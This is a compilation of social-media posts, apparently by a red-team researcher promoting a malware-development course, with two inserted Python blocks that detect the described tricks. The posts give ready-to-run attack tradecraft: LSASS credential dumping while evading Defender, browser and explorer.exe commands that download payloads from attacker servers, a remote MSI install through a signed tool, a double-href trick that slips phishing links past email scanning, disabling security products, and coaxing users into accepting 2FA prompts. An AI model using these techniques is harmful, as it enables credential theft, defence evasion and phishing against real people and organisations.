MalDev Academy is ready!
Website: MaldevAcademy[.]com
Launch date: April 16th, 2023
- 32 Beginner modules
- 49 Intermediate modules
- 10 Advanced modules
- 20 in the works for updates in the next few months
- 65 Custom code samples
Very fair pricing, starting at $249
@NUL0x4C
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my GitHub; feel free to test them out.
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
Here I bypassed Defender AV by making:
.eyb files as .exe
.faq files as .dll
I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
LOLBIN to dump LSASS:
Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Binary: DumpMinitool.exe
The params are case sensitive.
Another way to download files using msedge/chrome:
[msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom "http://server/evil.b64.html" > out.b64
- Downloaded file should end with .html.
- Binaries should be encoded.
Today I've launched . I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
Living Off Trusted Sites:
Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute, then O365 won't scan the link anymore.
<a href="phishing link">click</a> ==> junk
<a href="" href="phishing link">click</a> ==> inbox
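The defender's side of the double-href trick, as an added example that is not part of the original thread: a link scanner that reads only the first href on an anchor sees the empty decoy, so the parser below keeps every href value a tag carries (Python's html.parser preserves repeated attributes) and flags any anchor with more than one. The HTML snippets are constructed for this example and use example.com in place of a real phishing URL.

```python
"""Flag <a> tags whose href attribute appears more than once.

Added example, not from the original thread. A scanner that trusts only the
first href on an <a> tag sees the empty decoy, while the client rendering the
message may resolve a different one. Collecting every href value, duplicates
included, makes that disagreement visible. The HTML samples are constructed.
"""
from html.parser import HTMLParser


class AnchorAuditor(HTMLParser):
    """Record the full href list of every <a> tag, in source order."""

    def __init__(self):
        super().__init__()
        self.anchors = []  # one list of href values per <a> tag

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        # html.parser keeps repeated attributes as separate (name, value) pairs,
        # so href="" href="https://..." arrives here as two entries.
        self.anchors.append([value or "" for name, value in attrs if name == "href"])


def audit_anchors(html: str) -> list:
    """Return one finding per <a> tag that carries more than one href attribute.

    Each finding lists every href value seen on the tag and the non-empty ones,
    so a scanner can check all candidate destinations instead of only the first.
    """
    parser = AnchorAuditor()
    parser.feed(html)
    parser.close()
    findings = []
    for hrefs in parser.anchors:
        if len(hrefs) > 1:
            findings.append({
                "hrefs": hrefs,
                "urls": [h for h in hrefs if h.strip()],
                "reason": "duplicate href attribute on <a> tag",
            })
    return findings


def extract_urls(html: str) -> list:
    """Every non-empty href in the document, which is what a scanner should check."""
    parser = AnchorAuditor()
    parser.feed(html)
    parser.close()
    return [h for hrefs in parser.anchors for h in hrefs if h.strip()]


# Constructed samples: a normal link and the double-href variant from the thread.
CLEAN_HTML = '<p><a href="https://example.com/">click</a></p>'
DOUBLE_HREF_HTML = '<p><a href="" href="https://example.com/page">click</a></p>'

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_HTML), ("double-href", DOUBLE_HREF_HTML)):
        print(label, audit_anchors(doc), extract_urls(doc))
```

The check deliberately does not decide which href "wins": HTML parsers and mail clients differ on duplicate attributes, and a scanner that must agree with every renderer is safest treating each value as a destination to be checked.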
For the past couple of months
@NUL0x4C
and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com
1. Insert a file attachment on a OneNote Notebook
2. Double click the inserted attachment and grab the direct download link.
Added to
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from Gmail/O365 or chats from WhatsApp and exfiltrate & download files. ENJOY.
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure.
msedge.exe --app="http://example[.]com/index.html" --kiosk
Outlook attachments can be directly downloaded.
1. Compose an email
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net)
Link is valid for ~15 minutes.
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download.
Default browser:
explorer.exe https://server/file.exe.txt
Edge:
explorer.exe microsoft-edge:https://server/file.exe.txt
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen.
In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!
Didn't have time to talk about the newly released TLDs last week, but here we go.
File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing
Procdump dump lsass
Defender: Threat detected!
Sqldumper dump lsass
Defender: Sure, go right ahead!
btw dumping lsass with sqldumper.exe is not new, actually it's quite old.
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly.
I tested msi-install, it downloads an MSI file to C:\Windows\Installer\ then installs it.
devinit.exe run -t msi-install -i http://10.0.0.18/out.msi
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe
Execute a local binary or one from a file share.
Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed.
I've seen other security solutions that do this, try to copy the file quickly before it's removed.
I've created a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
How much awareness is there around Context Menu Spoofing/Hijacking for persistence?
Here's hijacking SentinelOne's "Scan for threats" to run a command.
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge.
start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F
Modify file extension back to original after download.
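Detection logic for the download tricks collected in this thread (the msedge/chrome --headless --dump-dom fetch, the --app/--kiosk window, explorer.exe launching a URL, devinit.exe msi-install from a remote URL, and the "start /min msedge.exe ... && taskkill" chain), as an added example that is not part of the original thread: each trick becomes a rule evaluated over process-creation events. The event records are constructed for this example and carry only the image path and command line a Sysmon Event ID 1 or Security 4688 record would provide; the rule names and the double-extension check generalize the thread's file.exe.txt / file.exe.zip examples to other executable types.

```python
"""Command-line detection rules for living-off-the-land browser/dev-tool downloads.

Added example, not from the original thread. Rule names, the event tuple shape
and the sample events are this example's own; command lines mirror the ones
quoted in the thread. The devinit.exe image path is a placeholder.
"""
import re

BROWSERS = {"msedge.exe", "chrome.exe"}
URL_RE = re.compile(r"^(?:microsoft-edge:)?https?://", re.IGNORECASE)
# file.exe.txt, payload.dll.zip, ...: an executable extension hidden behind a benign one
DOUBLE_EXT_RE = re.compile(r"\.(?:exe|dll|msi|ps1|bat|scr)\.[a-z0-9]{1,5}$", re.IGNORECASE)


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted strings whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, e.g. C:\\...\\msedge.exe -> msedge.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def url_path(token: str) -> str:
    """Drop the microsoft-edge: prefix, query and fragment so only the URL path remains."""
    bare = re.sub(r"^microsoft-edge:", "", token, flags=re.IGNORECASE)
    return bare.split("?", 1)[0].split("#", 1)[0]


def classify(image: str, cmdline: str) -> list:
    """Return the names of every rule a process-creation event matches."""
    image = image_name(image)
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    urls = [t for t in toks if URL_RE.match(t)]
    hits = []
    if image in BROWSERS and "--headless" in low and "--dump-dom" in low:
        hits.append("browser_headless_dom_dump")          # page body written to a local file
    if image in BROWSERS and "--kiosk" in low and any(t.startswith("--app=") for t in low):
        hits.append("browser_kiosk_app_window")           # full-screen, chrome-less window
    if image == "explorer.exe" and urls:
        hits.append("explorer_url_launch")                # shell used as the URL opener
    if image == "devinit.exe" and "msi-install" in low and urls:
        hits.append("devinit_remote_msi_install")         # signed tool fetching an MSI
    if image == "cmd.exe" and "taskkill" in low and any(image_name(t) in BROWSERS for t in toks):
        hits.append("browser_start_and_kill_chain")       # start browser, wait, kill it
    if any(DOUBLE_EXT_RE.search(url_path(u)) for u in urls):
        hits.append("double_extension_download_url")      # executable behind a benign extension
    return hits


def scan(events: list) -> list:
    """Return (image name, matched rules) for every event that matches at least one rule."""
    results = []
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            results.append((image_name(image), hits))
    return results


# Constructed process-creation events modelled on the command lines in the thread.
EDGE = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"
SAMPLE_EVENTS = [
    (EDGE, 'msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://server/evil.b64.html"'),
    (EDGE, 'msedge.exe --app="http://example.com/index.html" --kiosk'),
    ("C:\\Windows\\explorer.exe", "explorer.exe microsoft-edge:https://server/file.exe.txt"),
    ("C:\\PLACEHOLDER_VS_PATH\\devinit.exe", "devinit.exe run -t msi-install -i http://10.0.0.18/out.msi"),
    ("C:\\Windows\\System32\\cmd.exe",
     'cmd.exe /c start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F'),
    (EDGE, "msedge.exe --profile-directory=Default https://example.com/"),  # benign launch
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, hits)
```

The rules key on arguments rather than image paths on purpose: the thread's own point is that these binaries are legitimate and signed, so the signal lives in the combination of switches and URL, and a renamed copy of the browser still carries the same command line.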
I mentioned a few days ago that there are two LOLBIN binaries that do DLL injection.
After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔
I'll be dropping two variations of a new initial access technique exclusively for
@MalDevAcademy
premium & lifetime users (in update 2 or update 3).
Red teamers you'll be very happy.
Blue teamers you'll want to have safeguards in place for this.
I actually didn't know about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
All security solution vulns I previously found were too easily exploitable.
In the newly posted Exploiting EDRs For Evasion module in
@MalDevAcademy
I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
Before we wrap up the year, it’s time to get out one last Kali release for 2023.
Announcing Kali 2023.4, with a focus on the addition of Hyper-V support to Vagrant, ARM64 cloud images, support for the Pi 5, and an update to GNOME 45. Check it out!
20 new websites added to
An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds:
@BushidoToken
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
Please make sure you're aware that this technique is not necessarily VNC-specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer, etc.).
But I felt noVNC provided the most seamless experience to target users.
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit.
I also updated it to add a few more techniques.
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service.
1. sc qc <service> ==> check dependencies
2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
I added macros as a category on . Credits to
@Hexacorn
for making me realize how many file extensions there are related to macros.
I also removed a few other categories that I don't think are as useful as I initially thought they'd be. Enjoy!
@Warlockobama
That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this:
1. Suspicious
2. Technical glitch
3. Intended "feature"
Maybe if we're lucky our odds may just be the latter two.
I think this is a great example of how important it is to be conscious of what you put out there. The smallest things can potentially be used in ways you didn't expect.
@mrd0x
Example that works:
./DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full
Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full
Output file: 'dump6.txt'
Process id: 660
Dump type: Full
Dumped process.
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
@techspence
I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image.
Also note that it's still subject to other methods of detection like behavior, heuristics etc.
@NinjaParanoid
I feel like it's a small part of the community but they're just very loud and always seem to be morally and intellectually superior to everyone else
@mythicalcmd
@NUL0x4C
This training is far more in-depth. Also, it's text-based, not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
Microsoft took measures to ensure the link breaks if this is done when an email is composed normally. But when sent using the 'Reply' or 'Reply All' functionality that protection mechanism doesn't kick in.
Added:
Although this can also be used for phishing, it's severely restricted due to the time limit & file type restrictions. I can still add it as a phishing technique if people think it's worth adding. Any comments are welcome.